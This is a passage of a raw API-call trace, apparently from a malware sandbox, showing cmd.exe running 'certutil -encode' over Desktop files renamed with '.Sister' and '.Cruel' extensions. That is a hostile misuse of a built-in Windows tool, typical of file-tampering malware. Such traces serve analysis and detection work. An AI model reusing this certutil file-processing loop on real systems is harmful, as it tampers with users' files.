[0272.343] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0272.343] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0272.343] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0272.343] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0272.343] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0272.343] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0272.343] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0272.343] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0272.343] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0272.343] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0272.343] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0272.343] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0272.344] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0272.344] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0272.344] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0272.344] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0272.344] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0272.344] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0272.344] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0272.344] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0272.344] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0272.344] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0272.344] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0272.344] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0272.344] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0272.344] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0272.344] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0272.344] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0272.344] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0272.344] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0272.344] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0272.344] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0272.344] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0272.344] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0272.344] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0272.345] ??_V@YAXPEAX@Z () returned 0x1 [0272.345] GetProcessHeap () returned 0x21ed8c70000 [0272.345] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9400f40 [0272.345] GetProcessHeap () returned 0x21ed8c70000 [0272.345] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa6) returned 0x21ed93b0bc0 [0272.345] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0272.345] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0272.345] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0272.345] GetProcessHeap () returned 0x21ed8c70000 [0272.345] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9410f30 [0272.346] SetErrorMode (uMode=0x0) returned 0x0 [0272.347] SetErrorMode (uMode=0x1) returned 0x0 [0272.347] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9410f40, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0272.347] SetErrorMode (uMode=0x0) returned 0x1 [0272.347] GetProcessHeap () returned 0x21ed8c70000 [0272.347] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9410f30, Size=0x52) returned 0x21ed9410f30 [0272.347] GetProcessHeap () returned 0x21ed8c70000 [0272.347] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9410f30) returned 0x52 [0272.347] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0272.347] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0272.347] GetProcessHeap () returned 0x21ed8c70000 [0272.347] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937b1a0 [0272.347] GetProcessHeap () returned 0x21ed8c70000 [0272.347] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed93b0130 [0272.347] GetProcessHeap () returned 0x21ed8c70000 [0272.347] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0130, Size=0x1be) returned 0x21ed93b0130 [0272.348] GetProcessHeap () returned 0x21ed8c70000 [0272.348] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0130) returned 0x1be [0272.348] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0272.348] GetProcessHeap () returned 0x21ed8c70000 [0272.348] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d66bd0 [0272.348] GetProcessHeap () returned 0x21ed8c70000 [0272.348] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66bd0, Size=0x7e) returned 0x21ed8d66bd0 [0272.348] GetProcessHeap () returned 0x21ed8c70000 [0272.348] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66bd0) returned 0x7e [0272.348] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.348] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0272.348] GetLastError () returned 0x2 [0272.349] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.349] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0272.349] GetLastError () returned 0x2 [0272.349] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.349] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0272.349] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0272.349] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0272.350] GetLastError () returned 0x2 [0272.350] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0272.350] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0272.350] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0272.350] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0272.350] ??_V@YAXPEAX@Z () returned 0x1 [0272.350] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0272.419] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0272.419] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0272.420] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0272.420] GetProcessHeap () returned 0x21ed8c70000 [0272.420] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45ce0 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0272.420] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0272.421] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0272.422] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0272.422] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0272.422] GetProcessHeap () returned 0x21ed8c70000 [0272.422] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45ce0) returned 1 [0272.422] GetProcessHeap () returned 0x21ed8c70000 [0272.422] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c958e0 [0272.422] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0272.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0272.422] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0272.517] _get_osfhandle (_FileHandle=0) returned 0x4c [0272.517] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0272.585] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"yLW8a6BSku30pNN.csv.Sister\" \"yLW8a6BSku30pNN.csv.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"yLW8a6BSku30pNN.csv.Sister\" \"yLW8a6BSku30pNN.csv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"yLW8a6BSku30pNN.csv.Sister\" \"yLW8a6BSku30pNN.csv.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x123c, dwThreadId=0x1334)) returned 1 [0272.632] CloseHandle (hObject=0xa4) returned 1 [0272.632] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0272.632] GetProcessHeap () returned 0x21ed8c70000 [0272.632] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d160) returned 1 [0272.632] GetEnvironmentStringsW () returned 0x21ed937d160* [0272.632] GetProcessHeap () returned 0x21ed8c70000 [0272.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937e340 [0272.633] FreeEnvironmentStringsA (penv="=") returned 1 [0272.633] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0275.052] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0275.052] CloseHandle (hObject=0xa8) returned 1 [0275.052] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0275.052] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0275.053] GetProcessHeap () returned 0x21ed8c70000 [0275.053] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937e340) returned 1 [0275.053] GetEnvironmentStringsW () returned 0x21ed937d160* [0275.053] GetProcessHeap () returned 0x21ed8c70000 [0275.053] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937e340 [0275.053] FreeEnvironmentStringsA (penv="=") returned 1 [0275.054] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0275.054] GetProcessHeap () returned 0x21ed8c70000 [0275.054] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937e340) returned 1 [0275.054] GetEnvironmentStringsW () returned 0x21ed937d160* [0275.054] GetProcessHeap () returned 0x21ed8c70000 [0275.054] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937e340 [0275.054] FreeEnvironmentStringsA (penv="=") returned 1 [0275.054] GetProcessHeap () returned 0x21ed8c70000 [0275.054] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c958e0) returned 1 [0275.054] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0275.054] ??_V@YAXPEAX@Z () returned 0x1 [0275.055] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c0f1650, ftCreationTime.dwHighDateTime=0x1d5e376, ftLastAccessTime.dwLowDateTime=0x16dfbdd0, ftLastAccessTime.dwHighDateTime=0x1d5e0d7, ftLastWriteTime.dwLowDateTime=0x16dfbdd0, ftLastWriteTime.dwHighDateTime=0x1d5e0d7, nFileSizeHigh=0x0, nFileSizeLow=0x81a5, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Z31qy U6YA31zG.bmp.Sister", cAlternateFileName="")) returned 1 [0275.055] GetProcessHeap () returned 0x21ed8c70000 [0275.055] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937dcb0, Size=0x6b8) returned 0x21ed937d160 [0275.055] GetProcessHeap () returned 0x21ed8c70000 [0275.055] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937d160) returned 0x6b8 [0275.056] GetProcessHeap () returned 0x21ed8c70000 [0275.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a160 [0275.056] GetProcessHeap () returned 0x21ed8c70000 [0275.056] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a160, Size=0x58) returned 0x21ed8d2a160 [0275.056] GetProcessHeap () returned 0x21ed8c70000 [0275.056] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a160) returned 0x58 [0275.056] GetProcessHeap () returned 0x21ed8c70000 [0275.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a1d0 [0275.056] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0275.057] GetProcessHeap () returned 0x21ed8c70000 [0275.057] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8cc7f10 [0275.057] ??_V@YAXPEAX@Z () returned 0x1 [0275.057] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0275.057] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0275.057] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0275.058] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cc40 [0275.058] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0275.058] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcde80bc6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xcde80bc6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0275.058] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0275.058] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Z31qy U6YA31zG.bmp.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c0f1650, ftCreationTime.dwHighDateTime=0x1d5e376, ftLastAccessTime.dwLowDateTime=0x16dfbdd0, ftLastAccessTime.dwHighDateTime=0x1d5e0d7, ftLastWriteTime.dwLowDateTime=0x16dfbdd0, ftLastWriteTime.dwHighDateTime=0x1d5e0d7, nFileSizeHigh=0x0, nFileSizeLow=0x81a5, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Z31qy U6YA31zG.bmp.Sister", cAlternateFileName="Z31QYU~1.SIS")) returned 0x21ed8c7cdc0 [0275.059] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0275.059] _wcsnicmp (_String1="Z31QYU~1.SIS", _String2="Z31qy U6YA31zG.bmp.Sister", _MaxCount=0x19) returned 85 [0275.059] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0275.059] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0275.059] GetProcessHeap () returned 0x21ed8c70000 [0275.059] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8a10 [0275.059] ??_V@YAXPEAX@Z () returned 0x1 [0275.059] ??_V@YAXPEAX@Z () returned 0x1 [0275.059] GetProcessHeap () returned 0x21ed8c70000 [0275.059] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a1d0, Size=0x210) returned 0x21ed8d2a1d0 [0275.059] GetProcessHeap () returned 0x21ed8c70000 [0275.059] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a1d0) returned 0x210 [0275.060] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0275.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.060] GetFileType (hFile=0x50) returned 0x2 [0275.060] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0275.060] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0275.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.139] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0275.239] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0275.239] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0275.239] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0275.239] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0275.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.239] GetFileType (hFile=0x50) returned 0x2 [0275.239] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0275.239] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0275.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.308] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0275.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.428] GetFileType (hFile=0x50) returned 0x2 [0275.428] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0275.429] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0275.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.496] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2a170*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d2a170*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0275.585] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"Z31qy U6YA31zG.bmp.Sister\" \"Z31qy U6YA31zG.bmp.Cruel\" ") returned 64 [0275.585] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.585] GetFileType (hFile=0x50) returned 0x2 [0275.585] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0275.585] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0275.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.657] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x40) returned 1 [0275.766] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0275.767] _get_osfhandle (_FileHandle=1) returned 0x50 [0275.767] GetFileType (hFile=0x50) returned 0x2 [0275.767] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0275.767] GetConsoleMode (in: 